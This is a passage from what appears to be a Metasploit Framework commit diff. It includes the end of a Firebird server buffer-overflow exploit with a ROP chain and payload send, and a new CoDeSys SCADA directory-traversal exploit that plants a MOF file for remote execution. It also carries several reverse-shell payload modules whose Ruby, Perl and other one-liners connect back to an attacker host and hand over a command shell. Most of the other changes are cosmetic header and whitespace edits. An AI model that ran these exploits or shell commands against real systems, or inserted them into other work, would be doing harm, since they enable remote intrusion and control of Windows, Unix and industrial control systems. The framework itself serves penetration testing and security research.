0x00590328, # POP ECX # RETN [fbserver.exe] + 0x00000040, # 0x00000040-> ecx + 0x4a8573a1, # POP EDI # RETN [icuuc30.dll] + 0x0042ba8c, # RETN (ROP NOP) [fbserver.exe] + 0x00577605, # POP EAX # RETN [fbserver.exe] + 0x90909090, # nop + 0x004530ce, # PUSHAD # RETN [fbserver.exe] + ].flatten.pack("V*") + when 'Debug' + rop_chain = [ ].fill(0x41414141, 0..17).pack("V*") + end + return rop_chain + end + + def exploit + connect + + rop_nop_sled = [ ].fill(target['rop_nop'], 0..16).pack("V*") + + # this data gets written to the stack via memcpy, no more than 32 bytes can be written + overwrite_and_rop_chain = [ target['rop_pop'] ].pack("V") # POP to skip the 4 bytes of the original pivot + overwrite_and_rop_chain << [ (target['pivot'] - 8) ].pack("V") # MOV EDX,DWORD PTR DS:[EAX+8] + overwrite_and_rop_chain << stack_pivot_rop_chain + + filename = "C:\\#{rand_text_alpha(13)}.fdb" + evil_data = "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24" + evil_data << "\x00\x00\x00\x14" + evil_data << filename + evil_data << "\x00\x00\x00\x04\x00\x00\x00\x24" + evil_data << "\x05\x20" + evil_data << overwrite_and_rop_chain + evil_data << "\x15\x6c\x6f\x63\x61\x6c" + evil_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e" + evil_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02" + evil_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01" + evil_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b" + evil_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06" + evil_data << "\x41\x41\x41\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05" + evil_data << "\x00\x00\x00\x08\x00\x41\x41\x41" + evil_data << rop_nop_sled + evil_data << final_rop_chain + evil_data << payload.encoded + + print_status("#{rhost}:#{rport} - Sending Connection Request For #{filename}") + sock.put(evil_data) + + disconnect + end + +end diff --git a/modules/exploits/windows/misc/hp_magentservice.rb b/modules/exploits/windows/misc/hp_magentservice.rb index d409f9e417..dc5c198662 100644 --- a/modules/exploits/windows/misc/hp_magentservice.rb +++ b/modules/exploits/windows/misc/hp_magentservice.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' class Metasploit3 < Msf::Exploit::Remote diff --git a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb index 0ae8257604..7e2d7ff6bb 100644 --- a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb +++ b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb new file mode 100644 index 0000000000..999995d8b9 --- /dev/null +++ b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb @@ -0,0 +1,104 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::WbemExec + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SCADA 3S CoDeSys Gateway Server Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal vulnerability that allows arbitrary + file creation, which can be used to execute a mof file in order to gain remote + execution within the SCADA system. + }, + 'Author' => + [ + 'Enrique Sanchez ' + ], + 'License' => 'MSF_LICENSE', + 'References' => + [ + ['CVE', '2012-4705'], + ['URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf'] + ], + 'DisclosureDate' => 'Feb 02 2013', + 'Platform' => 'win', + 'Targets' => + [ + ['Windows Universal S3 CoDeSyS < 2.3.9.27', { }] + ], + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(1211), + ], self.class) + end + + ## + # upload_file(remote_filepath, remote_filename, local_filedata) + # + # remote_filepath: Remote filepath where the file will be uploaded + # remote_filename: Remote name of the file to be executed ie. boot.ini + # local_file: File containing the read data for the local file to be uploaded, actual open/read/close done in exploit() + def upload_file(remote_filepath, remote_filename, local_filedata = null) + magic_code = "\xdd\xdd" + opcode = [6].pack('L') + + # We create the filepath for the upload, for execution it should be \windows\system32\wbem\mof\ 'Unix Command Shell, Reverse TCP SSL (telnet)', - 'Version' => '$Revision$', 'Description' => %q{ Creates an interactive shell via mknod and telnet. This method works on Debian and other systems compiled - without /dev/tcp support. This module uses the '-z' + without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL. }, 'Author' => 'RageLtMan', diff --git a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb index 96724f20e7..3e2981670b 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP SSL (via perl)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via perl, uses SSL', 'Author' => 'RageLtMan', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb index 9892515e26..201a01ed7f 100644 --- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP SSL (via php)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via php, uses SSL', 'Author' => 'RageLtMan', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse_python.rb b/modules/payloads/singles/cmd/unix/reverse_python.rb index ed59723041..55a7223440 100644 --- a/modules/payloads/singles/cmd/unix/reverse_python.rb +++ b/modules/payloads/singles/cmd/unix/reverse_python.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb index a7e232d24b..8afe25f47d 100644 --- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.', 'Author' => 'RageLtMan', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb index 6743def9e9..3b728e7b1f 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP SSL (via Ruby)', - 'Version' => '$Revision$', 'Description' => 'Connect back and create a command shell via Ruby, uses SSL', 'Author' => 'RageLtMan', 'License' => MSF_LICENSE, @@ -44,6 +39,9 @@ module Metasploit3 def command_string lhost = datastore['LHOST'] lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - "ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end'" + res = "ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new" + res << "(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while" + res << "(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end'" + return res end end diff --git a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb index 593e69d716..5f97578b10 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,8 +17,7 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, - 'Name' => 'Unix Command Shell, Double reverse TCP SSL (telnet)', - 'Version' => '$Revision$', + 'Name' => 'Unix Command Shell, Double Reverse TCP SSL (telnet)', 'Description' => 'Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option', 'Author' => [ 'hdm', # Original module diff --git a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb index 39aecc0b09..324d36b949 100644 --- a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb index ca70b10879..67bfafe883 100644 --- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.', 'Author' => 'RageLtMan', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb index 82f61c768d..0b61f6a96f 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Ruby Command Shell, Reverse TCP SSL', - 'Version' => '$Revision$', 'Description' => 'Connect back and create a command shell via Ruby, uses SSL', 'Author' => 'RageLtMan', 'License' => MSF_LICENSE, @@ -46,7 +41,8 @@ module Metasploit3 def ruby_string lhost = datastore['LHOST'] lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - rbs = "require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end" + rbs = "require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\"," + rbs << "\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end" return rbs end end diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb index 05f23f3ae8..1f20d431be 100644 --- a/modules/post/windows/gather/credentials/tortoisesvn.rb +++ b/modules/post/windows/gather/credentials/tortoisesvn.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' require 'rex' require 'msf/core/post/windows/priv' diff --git a/modules/post/windows/gather/forensics/enum_drives.rb b/modules/post/windows/gather/forensics/enum_drives.rb index fb7e1d8f5d..1e461f4742 100644 --- a/modules/post/windows/gather/forensics/enum_drives.rb +++ b/modules/post/windows/gather/forensics/enum_drives.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + # # List physical drives and logical volumes on the remote system # diff --git a/modules/post/windows/gather/forensics/imager.rb b/modules/post/windows/gather/forensics/imager.rb index df2c8f769a..827d0c3a09 100644 --- a/modules/post/windows/gather/forensics/imager.rb +++ b/modules/post/windows/gather/forensics/imager.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + # # Forensic byte-for-byte imaging of remote disks and volumes # diff --git a/modules/post/windows/gather/forensics/nbd_server.rb b/modules/post/windows/gather/forensics/nbd_server.rb index 4e85c89abe..605ae4814b 100644 --- a/modules/post/windows/gather/forensics/nbd_server.rb +++ b/modules/post/windows/gather/forensics/nbd_server.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + # nbd_server.rb # # Maps remote disks and logical volumes to a local Network Block Device diff --git a/modules/post/windows/manage/mssql_local_auth_bypass.rb b/modules/post/windows/manage/mssql_local_auth_bypass.rb index 3c31c1d15d..f53d77482c 100644 --- a/modules/post/windows/manage/mssql_local_auth_bypass.rb +++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' require 'rex' require 'msf/core/post/common' diff --git a/modules/post/windows/manage/nbd_server.rb b/modules/post/windows/manage/nbd_server.rb index a41765f305..a32633e5e4 100644 --- a/modules/post/windows/manage/nbd_server.rb +++ b/modules/post/windows/manage/nbd_server.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + # # Maps remote disks and logical volumes to a local Network Block Device # server. Allows for forensic tools to be executed on the remote disk diff --git a/modules/post/windows/manage/powershell/exec_powershell.rb b/modules/post/windows/manage/powershell/exec_powershell.rb index 59bc7cccff..c3e08ceb23 100644 --- a/modules/post/windows/manage/powershell/exec_powershell.rb +++ b/modules/post/windows/manage/powershell/exec_powershell.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb index 1ca074b90c..a29279ad31 100644 --- a/modules/post/windows/manage/rpcapd_start.rb +++ b/modules/post/windows/manage/rpcapd_start.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/post/windows/manage/sdel.rb b/modules/post/windows/manage/sdel.rb index 50e737e76b..a090d9bf50 100644 --- a/modules/post/windows/manage/sdel.rb +++ b/modules/post/windows/manage/sdel.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/plugins/wmap.rb b/plugins/wmap.rb index dd0172c5f1..77f5de94c4 100644 --- a/plugins/wmap.rb +++ b/plugins/wmap.rb @@ -15,16 +15,16 @@ module Msf class Plugin::Wmap < Msf::Plugin class WmapCommandDispatcher - attr_accessor :wmapmodules # Enabled Wmap modules + attr_accessor :wmapmodules # Enabled Wmap modules attr_accessor :targets # Targets - attr_accessor :lastsites # Temp location of previously obtained sites + attr_accessor :lastsites # Temp location of previously obtained sites attr_accessor :rpcarr # Array or rpc connections - attr_accessor :njobs # Max number of jobs + attr_accessor :njobs # Max number of jobs attr_accessor :nmaxdisplay # Flag to stop displaying the same mesg attr_accessor :runlocal # Flag to run local modules only attr_accessor :masstop # Flag to stop everything attr_accessor :killwhenstop # Kill process when exiting - + include Msf::Ui::Console::CommandDispatcher def name @@ -44,7 +44,7 @@ class Plugin::Wmap < Msf::Plugin "wmap_vulns" => "Display web vulns", } end - + def cmd_wmap_vulns(*args) args.push("-h") if args.length == 0 @@ -67,7 +67,7 @@ class Plugin::Wmap < Msf::Plugin end end - + def cmd_wmap_modules(*args) args.push("-h") if args.length == 0 @@ -100,7 +100,7 @@ class Plugin::Wmap < Msf::Plugin while (arg = args.shift) case arg when '-c' - self.targets = Hash.new() + self.targets = Hash.new() when '-l' view_targets return @@ -112,7 +112,7 @@ class Plugin::Wmap < Msf::Plugin print_status("Usage: wmap_targets [options]") print_line("\t-h Display this help text") print_line("\t-t [urls] Define target sites (vhost1,url[space]vhost2,url) ") - print_line("\t-d [ids] Define target sites (id1, id2, id3 ...)") + print_line("\t-d [ids] Define target sites (id1, id2, id3 ...)") print_line("\t-c Clean target sites list") print_line("\t-l List all target sites") @@ -137,6 +137,13 @@ class Plugin::Wmap < Msf::Plugin else print_error("Unable to create site") end + when '-d' + del_idx = args.shift + if del_idx + delete_site(del_idx.to_i) + else + print_error("Provide index of site to delete") + end when '-l' view_sites return @@ -148,7 +155,7 @@ class Plugin::Wmap < Msf::Plugin if not u return end - + if l == nil or l.empty? l = 200 s = true @@ -156,25 +163,25 @@ class Plugin::Wmap < Msf::Plugin l = l.to_i s = false end - + if u.include? 'http' # Parameters are in url form view_site_tree(u,l,s) else - # Parameters are digits - if !self.lastsites or self.lastsites.length == 0 + # Parameters are digits + if !self.lastsites or self.lastsites.length == 0 view_sites print_status ("Web sites ids. referenced from previous table.") end - + target_whitelist = [] ids = u.to_s.split(/,/) ids.each do |id| next if id.to_s.strip.empty? - + if id.to_i > self.lastsites.length - print_error("Skipping id #{id}...") + print_error("Skipping id #{id}...") else target_whitelist << self.lastsites[id.to_i] #print_status("Loading #{self.lastsites[id.to_i]}.") @@ -185,18 +192,19 @@ class Plugin::Wmap < Msf::Plugin return if target_whitelist.length == 0 if not self.targets - self.targets = Hash.new() + self.targets = Hash.new() end target_whitelist.each do |ent| view_site_tree(ent,l,s) - end + end end return when '-h' print_status("Usage: wmap_sites [options]") print_line("\t-h Display this help text") print_line("\t-a [url] Add site (vhost,url)") + print_line("\t-d [id] Delete site") print_line("\t-l List all available sites") print_line("\t-s [id] Display site structure (vhost,url|ids) (level)") @@ -210,11 +218,11 @@ class Plugin::Wmap < Msf::Plugin end def cmd_wmap_nodes(*args) - + if not self.rpcarr - self.rpcarr=Hash.new() + self.rpcarr=Hash.new() end - + args.push("-h") if args.length == 0 while (arg = args.shift) @@ -225,7 +233,7 @@ class Plugin::Wmap < Msf::Plugin s = args.shift u = args.shift p = args.shift - + res = rpc_add_node(h,r,s,u,p,false) if res print_status("Node created.") @@ -234,20 +242,20 @@ class Plugin::Wmap < Msf::Plugin end when '-c' idref = args.shift - + if not idref print_error("No id defined") return end if idref.upcase == 'ALL' print_status("All nodes removed") - self.rpcarr = Hash.new() + self.rpcarr = Hash.new() else idx=0 self.rpcarr.each do |k,v| if idx == idref.to_i self.rpcarr.delete(k) - print_status("Node deleted #{k}") + print_status("Node deleted #{k}") end idx += 1 end @@ -258,24 +266,24 @@ class Plugin::Wmap < Msf::Plugin user = args.shift pass = args.shift dbname = args.shift - + res = rpc_db_nodes(host,port,user,pass,dbname) if res print_status("OK.") else print_error("Error") - end + end when '-l' rpc_list_nodes return when '-j' rpc_view_jobs - return + return when '-k' node = args.shift jid = args.shift rpc_kill_node(node,jid) - return + return when '-h' print_status("Usage: wmap_nodes [options]") print_line("\t-h Display this help text") @@ -285,7 +293,7 @@ class Plugin::Wmap < Msf::Plugin print_line("\t-j View detailed jobs") print_line("\t-k ALL|id ALL|job_id Kill jobs on node") print_line("\t-l List all current nodes") - + print_line("") return else @@ -299,8 +307,8 @@ class Plugin::Wmap < Msf::Plugin # Stop everything self.masstop = false self.killwhenstop = true - - trap("INT") { + + trap("INT") { print_error("Stopping execution...") self.masstop = true if self.killwhenstop @@ -308,12 +316,12 @@ class Plugin::Wmap < Msf::Plugin end return } - + # Max numbers of concurrent jobs per node self.njobs = 25 self.nmaxdisplay = false self.runlocal = false - + # Formating sizeline = 60 @@ -334,11 +342,11 @@ class Plugin::Wmap < Msf::Plugin moduleverbose = false showprogress = false - + if not self.rpcarr - self.rpcarr = Hash.new() + self.rpcarr = Hash.new() end - + if not run_wmap_ssl print_status("Loading of wmap ssl modules disabled.") end @@ -365,7 +373,7 @@ class Plugin::Wmap < Msf::Plugin using_p = false using_m = false usinginipath = false - + mname = '' inipathname = '/' @@ -418,7 +426,7 @@ class Plugin::Wmap < Msf::Plugin if inipathname print_status("Using initial path #{inipathname}.") end - usinginipath = true + usinginipath = true when '-h' print_status("Usage: wmap_run [options]") @@ -431,16 +439,16 @@ class Plugin::Wmap < Msf::Plugin print_line("") return else - print_error("Unknown flag") + print_error("Unknown flag") return end end - + if (self.rpcarr.length == 0) and (mode & wmap_show == 0) print_error("NO WMAP NODES DEFINED. Executing local modules") self.runlocal = true end - + if self.targets == nil print_error("Targets have not been selected.") return @@ -450,14 +458,14 @@ class Plugin::Wmap < Msf::Plugin print_error("Targets have not been selected.") return end - + execmod = true if (mode & wmap_show != 0) execmod = false end self.targets.each_with_index do |t, idx| - + selected_host = t[1][:host] selected_port = t[1][:port] selected_ssl = t[1][:ssl] @@ -475,27 +483,27 @@ class Plugin::Wmap < Msf::Plugin end # wmap_dir, wmap_file - matches = Hash.new() + matches = Hash.new() # wmap_server - matches1 = Hash.new() + matches1 = Hash.new() # wmap_query - matches2 = Hash.new() + matches2 = Hash.new() # wmap_ssl - matches3 = Hash.new() + matches3 = Hash.new() # wmap_unique_query - matches5 = Hash.new() + matches5 = Hash.new() # wmap_generic - matches10 = Hash.new() + matches10 = Hash.new() # OPTIONS opt_str = nil jobify = false - + # This will be clean later load_wmap_modules(false) @@ -523,7 +531,7 @@ class Plugin::Wmap < Msf::Plugin end when :wmap_ssl if run_wmap_ssl - matches3[w]=true + matches3[w]=true end else # Black Hole @@ -537,7 +545,7 @@ class Plugin::Wmap < Msf::Plugin matches3 = sort_by_orderid(matches3) matches5 = sort_by_orderid(matches5) matches10 = sort_by_orderid(matches10) - + # # Handle modules that need to be run before all tests IF SERVER is SSL, once usually again the SSL web server. # :wmap_ssl @@ -556,20 +564,20 @@ class Plugin::Wmap < Msf::Plugin print_error("STOPPED.") return end - - # Module not part of profile or not match - if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) + + # Module not part of profile or not match + if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) idx += 1 begin # Module options hash - modopts = Hash.new() - + modopts = Hash.new() + # # The code is just a proof-of-concept and will be expanded in the future # print_status "Module #{xref[0]}" - + if (mode & wmap_expl != 0) # @@ -591,14 +599,14 @@ class Plugin::Wmap < Msf::Plugin modopts['VERBOSE'] = moduleverbose modopts['ShowProgress'] = showprogress modopts['RunAsJob'] = jobify - + begin if execmod rpcnode = rpc_round_exec(xref[0],xref[1], modopts, self.njobs) end rescue ::Exception print_status(" >> Exception during launch from #{xref[0]}: #{$!}") - end + end end rescue ::Exception @@ -616,26 +624,26 @@ class Plugin::Wmap < Msf::Plugin idx = 0 matches1.each_key do |xref| - + if self.masstop print_error("STOPPED.") return end - - # Module not part of profile or not match - if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) + + # Module not part of profile or not match + if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) idx += 1 - + begin # Module options hash - modopts = Hash.new() + modopts = Hash.new() # # The code is just a proof-of-concept and will be expanded in the future # - + print_status "Module #{xref[0]}" - + if (mode & wmap_expl != 0) # @@ -657,20 +665,20 @@ class Plugin::Wmap < Msf::Plugin modopts['VERBOSE'] = moduleverbose modopts['ShowProgress'] = showprogress modopts['RunAsJob'] = jobify - + begin if execmod rpcnode = rpc_round_exec(xref[0],xref[1], modopts, self.njobs) end rescue ::Exception print_status(" >> Exception during launch from #{xref[0]}: #{$!}") - end + end end rescue ::Exception print_status(" >> Exception from #{xref[0]}: #{$!}") end - end + end end # @@ -682,26 +690,26 @@ class Plugin::Wmap < Msf::Plugin idx = 0 matches.each_key do |xref| - + if self.masstop print_error("STOPPED.") return end - - # Module not part of profile or not match - if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) + + # Module not part of profile or not match + if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) idx+=1 begin # Module options hash - modopts = Hash.new() + modopts = Hash.new() # # The code is just a proof-of-concept and will be expanded in the future # - + print_status "Module #{xref[0]}" - + if (mode & wmap_expl != 0) # # For modules to have access to the global datastore @@ -722,7 +730,7 @@ class Plugin::Wmap < Msf::Plugin modopts['VERBOSE'] = moduleverbose modopts['ShowProgress'] = showprogress modopts['RunAsJob'] = jobify - + # # Run the plugins that only need to be # launched once. @@ -741,7 +749,7 @@ class Plugin::Wmap < Msf::Plugin print_error("STOPPED.") return end - + p = node.current_path testpath = Pathname.new(p) strpath = testpath.cleanpath(false).to_s @@ -785,7 +793,7 @@ class Plugin::Wmap < Msf::Plugin end if not strpath.match(excludefilestr) - if (not usinginipath) or (usinginipath and strpath.match(inipathname)) + if (not usinginipath) or (usinginipath and strpath.match(inipathname)) modopts['PATH'] = strpath print_status("Path: #{strpath}") @@ -795,14 +803,14 @@ class Plugin::Wmap < Msf::Plugin end rescue ::Exception print_status(" >> Exception during launch from #{xref[0]}: #{$!}") - end + end end end end when :wmap_dir if (node.is_leaf? and not strpath.include? ".") or node.is_root? or not node.is_leaf? - if (not usinginipath) or (usinginipath and strpath.match(inipathname)) - + if (not usinginipath) or (usinginipath and strpath.match(inipathname)) + modopts['PATH'] = strpath print_status("Path: #{strpath}") @@ -821,7 +829,7 @@ class Plugin::Wmap < Msf::Plugin rescue ::Exception print_status(" >> Exception from #{xref[0]}: #{$!}") end - end + end end # @@ -833,26 +841,26 @@ class Plugin::Wmap < Msf::Plugin idx = 0 matches5.each_key do |xref| - + if self.masstop print_error("STOPPED.") return end - - # Module not part of profile or not match - if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) + + # Module not part of profile or not match + if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) idx += 1 begin # Module options hash - modopts = Hash.new() + modopts = Hash.new() # # The code is just a proof-of-concept and will be expanded in the future # - + print_status "Module #{xref[0]}" - + if (mode & wmap_expl != 0) # # For modules to have access to the global datastore @@ -874,25 +882,25 @@ class Plugin::Wmap < Msf::Plugin modopts['VERBOSE'] = moduleverbose modopts['ShowProgress'] = showprogress modopts['RunAsJob'] = jobify - + # # Run the plugins for each request that have a distinct # GET/POST URI QUERY string. # - utest_query = Hash.new() + utest_query = Hash.new() h = self.framework.db.workspace.hosts.find_by_address(selected_host) s = h.services.find_by_port(selected_port) w = 